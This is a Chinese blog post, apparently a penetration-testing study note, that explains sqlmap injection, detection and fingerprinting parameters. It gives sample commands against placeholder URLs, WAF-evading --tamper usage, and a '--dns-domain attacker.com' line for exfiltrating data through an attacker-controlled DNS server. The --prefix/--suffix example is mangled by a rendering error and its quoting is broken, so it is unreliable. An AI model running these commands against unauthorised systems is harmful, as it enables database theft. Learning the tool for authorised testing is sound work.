SQLMAP注入参数-其他参数介绍

最新推荐文章于 2024-05-15 22:19:08 发布
最新推荐文章于 2024-05-15 22:19:08 发布
阅读量1k 收藏 1
点赞数
分类专栏: kali_linux渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42952508/article/details/126343874
版权

注入参数介绍

-p

  • 指定扫描的参数,使–level失效

  • -p “user-agent,referer”

–skip

  • 排除指定的扫描参数

  • –level=5 --skip=“id,user-agent”

URl注入点

sqlmap -u "http://targeturl/param1/value*/param2/value2/"

–dbms指定内容,提升工作效率(例如:–dbms=“mysql”)

  • MySQL<5.0>

  • Oracle<11i>

  • Microsoft SQL server<2005>

  • PostgreSQL

  • Microsoft Aceess

  • SQLite

  • 等等

–os

  • Linux

  • Windows

–invalid-bignum / --invalid-logical

  • 通常sqlmap使用负值使参数取值失效 id=12 → id=-13

  • bignum使用大数使参数值失效 id=999999999999

  • Logical使用布尔判断使取值失效 id=13 AND 18=19

–no-cast

  • 榨取数据时,sqlmap将所有结果转换为字符串,并用空格替换NULL结果

  • 老版本mysql数据库需要开启此开关

–no-escape

  • 出于混淆和避免出错的目的,payload中用单引号界定字符串时,sqlmap使用char()编码逃逸的方法替换字符串
SELECT 'foo' → SELECT CHAR(102)+CHAR(111)+CHAR(111)#按照原样子参数发送

–prefix / --suffix

  • KaTeX parse error: Undefined control sequence: \* at position 17: …uery = "SELECT \̲*̲ FROM users WHE…_GET[‘id’].‘’')LIMIT 0,1";
sqlmap -u "http://1.1.1.1/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix''')" --suffix "AND('abc'='abc''query = "SELECT * FROM users WHERE id=('1')<PAYLOAD>AND ('abc'='abc')LIMIT 0,1";

–tamper

  • 混淆脚本,用于绕过应用层过滤、IPS、WAF
sqlmap -u "http://?????" tamper="tamper/between.py/???.py"  -v 3

检测参数介绍

–level

  • 1-5级(默认1)

  • /usr/share/sqlmap/xml/payloads 查看不同级别下发送不同的payload

–risk

  • 1-4 (默认1 / 无害)

  • Risk升高可造成数据被篡改等风险(update)

–string, --not-string, --regexp, --code, --text-only, --titles

  • 页面比较,基于布尔的注入检测,依据返回页面内容的变化判断真假逻辑,但是有些页面随时间阈值变化,此时需要认为指定标识真假的字符串;

检测SQL注入存在的技术类型

默认使用全部技术

  • B:Boolean-based blind

  • E:Error-based

  • U:Union query-based

  • S:Stracked queries(文件系统,操作系统,注册表必须)

  • T:Time-based blind

–time-sec

  • 基于时间的注入检测响应延迟时间(默认5秒)

–union-cols

  • 默认联合查询1-10列,随–level增加量最多支持50例

  • –onion-cols 6-9

–union-char

  • 联合查询默认使用NULL,极端情况下NULL可能失败,此时可以手动指定数值

  • –union-char 123

–dns-domain

  • 攻击者控制了某DNS服务器,使用此功能可以提高数据榨取的速度
--dns-domain attacker.com

–second-order

  • 在一个页面注入的结果,从另一个页面体现出来
--second-order http://1.1.1.1/b.php

指纹信息参数

-f, --fingerprint, -b, --banner

  • 数据库管理系统指纹信息

  • DBMS,操作系统,架构,补丁

网络点点滴
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第二十节 Sqlmap系统参数-01
09-15
下面我们将详细介绍Sqlmap系统参数的四个方面:Sqlmap执行系统命令、Sqlmap结合Metasploit、注册表介绍Sqlmap注册表操作。 一、Sqlmap执行系统命令 Sqlmap可以执行系统命令,实现对目标系统的控制和探测。使用--...
sqlmap之sql注入(一)
m0_55313512的博客
02-27 5636
SQL注入(一)
 sql注入sqlmap使用
m0_71866532的博客
03-23 2828
其中参数“-T”用于指定表名称,“--columns”参数用于指定列出表中字段。#其中参数“-D”用于指定数据库名称,“--tables”参数用于列举表。#其中参数“-C”用于指定字段名称,参数“—dump”用于导出数据。#其中“-r”参数用于指定注入点的导出流量包的绝对路经文件。#,其中参数“--dbs”用于列举数据库。”参数用于指定列出表中字段。”用于指定字段名称,参数“”用于指定数据库名称,“1.打开sqlmap。”用于指定表名称,“
SQL注入sqlmap使用教程(超详细)
最新发布
MateSnake的博客
05-15 802
SQL注入sqlmap使用教程(超详细)
sql注入知识----sqlmap常用参数
尘玥的故事
01-23 962
在知道注入点在哪里时通过' * '进行测试 工具会识别' * '并在这里测试数据库常用 urrent-db //查看当前的数据库passwords //查看所有密码batch 按照软件默认设置,自动回答start x1 --stop x2 输出从x1到x2的啥啥啥参数:–answers参数:--threads-dbs 列出所有数据库current-db 获取当前数据库名称tables -D “ ” 获取指定数据库中的表 columns -T “4” -D “3”获取数据库3中的4表的所有字段(列名
SQLmap参数详解
Williamanddog的博客
01-19 5508
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
利用sqlmap进行POST注入
热门推荐
lwpoor123的博客
12-24 12万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数 其中出现了三次提示: it looks l...
第十节 Sqlmap注入参数1-01
09-15
Sqlmap 注入参数详解 Sqlmap 是一个开源的渗透测试工具,主要用于检测Web应用程序中的SQL注入漏洞。在使用 Sqlmap 时,需要了解一些关键参数,以便更好地对目标Web应用程序进行检测。本文将详细介绍 Sqlmap 的四个...
第十一节 Sqlmap注入参数2-01
09-15
"Sqlmap注入参数详解" Sqlmap是一款功能强大且广泛应用的SQL注入工具,本节课程将详细介绍Sqlmap的四个重要参数:强制设置无效值替换、自定义注入负载位置、设置Tamper脚本和设置DBMS认证。 Sqlmap强制设置无效值...
第二十六节 Sqlmap杂项参数-01
09-15
下面我们将详细介绍 Sqlmap 的一些杂项参数。 1. Sqlmap 使用缩写助记符 Sqlmap 提供灵活的缩写助记符来进行快速书写命令。例如,用户可以使用 `-z` 选项来启用缩写助记符。这样,用户可以将多个参数组合成一个...
第九节 Sqlmap注入位置介绍-01
09-15
Sqlmap 提供了多种方式来指定注入参数,例如: * -p 选项:指定探测的参数,例如:-p “id,user-agent” * --skip 选项:忽略探测具体的参数,例如:--level --skip “user-agent,referer” * --param-exclude 选项...
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 2633
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
Web安全工具—Sqlmap常用命令和参数(持续更新)
weixin_44431280的博客
04-07 1万+
Web安全工具—SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习。 一:SQLMAP介绍: 简介:sqlmap是一个由python语言编写的开源自动化渗透测试工具,主要被用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具。 支持检测的数据库:access,mysql,oracle,postgresql,sqlserver(mssql),db2等 支持的注入类型:布尔盲注,时间盲注,显错注入,堆叠注入,联合查询注入等,
SQLMap 使用参数详解
qq_37019068的博客
10-09 1万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
SQLmap之sql注入(一)
qq_58000413的博客
08-13 934
-level >= 3 时sqlmap会尝试对User-Angent、referer进行注入。h、风险等级,共4个等级,当为2时会增加基于事件的测试语句,3会增加or语句的sql注入参数 -risk。c、sqlmap扫描等级(1-5):--level >= 2 时sqlmap会尝试注入cookie参数SQLMAP注入教程-11种常见SQLMAP使用方法详解 - APT-101 - 博客园。二、使用--os-shell之后会生成两个文件。一、执行--os-shell的系统操作的要求。......
SQL注入详解(包含SQLMap用法)
Zyu0
12-07 3807
这个系列讲的是整个SQL注入流程,其中包含各种手工注入姿势、SQLmap自动化注入及安全防护绕过姿势详解,现在只完成了其中一部分内容,每天都会更新,感兴趣的可以持续关注一下~
SQL 注入神器:SQLMap 参数详解
Flag少侠的博客
05-01 1953
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
SQL注入总结 附带sqlmap使用参数
weixin_52206305的博客
03-07 1036
SQL注入漏洞(SQLinjection)是Web层面最高危的漏洞之一。在2008年至2010年期间,SQL注入漏洞连续3年在OWASP年度十大漏洞排行中排名第一。在2005年前后,SQL注入漏洞到处可见,在用户登录或者搜索时,只需要输入一个单引号就可以检测出这种漏洞。随着Web应用程序的安全性不断提高,SQL注入漏洞逐渐减少,同时也变得更加难以检测与利用。
sqlmap进行SQL注入
weixin_45095113的博客
03-16 526
sqlmap跑SQL注入
sqlmap -r --dbs
09-03
对于你的问题,`sqlmap -r --dbs` 是一个用于通过 SQL 注入检测和获取数据库信息的命令。它通常用于网络安全测试中。 `-r` 参数表示使用从请求文件中获取的数据进行注入测试。`--dbs` 参数表示获取数据库的名称。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值